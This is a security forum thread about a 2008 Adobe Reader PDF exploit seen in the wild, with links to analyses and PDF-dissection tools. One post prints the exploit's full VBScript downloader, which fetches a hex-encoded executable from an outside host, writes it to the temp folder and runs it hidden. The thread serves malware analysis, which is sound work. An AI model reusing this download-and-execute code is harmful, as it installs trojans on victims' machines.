New pdf exploit

[SysAdMini]

Adobe Reader vulnerability exploited in the wild
http://isc.sans.org/diary.html?storyid=5312

at the time of writing this article, according to VirusTotal 0 (yes – ZERO) AV products detected this malicious PDF.

[Serg]

This exploit execute some VBS downloader

Code: [Select]

<script language="VBScript">
on error resume next

Function DownloadExecute(source, target) on error resume next Dim wobj, eobj, sobj, xobj, aobj, eloc, tfold, tfile, binstring, response, i, x

Set wobj = CreateObject("WScript.Shell") Set sobj = CreateObject("Scripting.FileSystemObject")

If VarType(xobj) <> vbObject Then Set xobj = CreateObject("MSXML2.XMLHTTP") If VarType(xobj) <> vbObject Then Set xobj = CreateObject("Microsoft.XMLHTTP")

If sobj.FileExists(eloc) = False Then
   xobj.Open "GET", source, False
   xobj.setRequestHeader "Request", "xpreload"
   xobj.Send
   response = xobj.responseText

   If Len(response) > 1 And InStr(LCase(binstring), "<html>") = 0 Then

        Dim ss, sn, sp, sd(), bd()
        ss = Len(response)
        sn = 5000

        sp = FormatNumber((ss / sn), 0) + 1
        ReDim sd(sp), bd(sp)

        For i = 0 To sp
           sd(i) = Mid(response, (i*sn)+1, sn)

           For x = 1 To Len(sd(i)) Step 2
           bd(i) = bd(i) & Chr(Clng("&H" & Mid(sd(i), x, 2)))
           Next

           binstring = binstring & bd(i)
        Next

   Set tfold = sobj.GetSpecialFolder(2)
   Set tfile = tfold.CreateTextFile(target)
   tfile.Write binstring
   tfile.Close

   End If
End If

wobj.run tfold & Chr(92) & target, 0
End Function
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=xpre", "xpre.exe") </script>
 

xpre.exe - is downloader of some online games trojans

[pnuemo]

nice work

[sowhat-x]

Since many people out there seem to be interested in pdf exploit variants...
http://www3.malekal.com/pdf.txt

[SysAdMini]

Shoulder Surfing a Malicious PDF Author
http://blog.didierstevens.com/2008/11/10/shoulder-surfing-a-malicious-pdf-author/

[sowhat-x]

In the same spirit as article above... 
http://www.757labs.com/projects/pdfresurrect/

[SysAdMini]

Thanks, Conrad.

infonews.ath.cx, Clicksor and a nasty PDF exploit
http://www.dynamoo.com/blog/2008/11/infonewsathcx-clicksor-and-nasty-pdf.html

[SysAdMini]

Acrobat continued activity in the wild
http://isc.sans.org/diary.html?storyid=5324

[pnuemo]

i'm really enjoying all of this pdf stuff.  thanks for the links everyone.

[sowhat-x]

And here's a win32 'semi-hackish' port of 757labs pdfresurrect...
I see that Didier Stevens also provides a couple of nifty python scripts in his blog:
http://blog.didierstevens.com/programs/pdf-tools/

[sowhat-x]

From cjeremy... 
http://www.sudosecure.net/archives/313

[sowhat-x]

And another useful app to exist in people's toolbox for pdf files' examination...
http://ccxvii.net/fitz/

Code: [Select]

pdftool show -b (print streams as raw binary data...)
pdftool show -d (decode streams...)
pdftool clean -x (expand compressed streams...)
etc etc...

[bobby]

http://sourceforge.net/project/showfiles.php?group_id=203466&package_id=249639&release_id=628626

btw. the latest info.pdf-thing is not using compressed streams for hiding javascripts. It uses graphic elements of PDF document. I do not know any tool that will extract these. You need to do a manual dissection (any text editor will do the job) and convert the data from Hex (ASCII codes) to Text, and/or from Unicode sequence to shellcode.

[cjeremy]

Bobby do you have a sample of these new pdf files.  I would like to examine them if you do.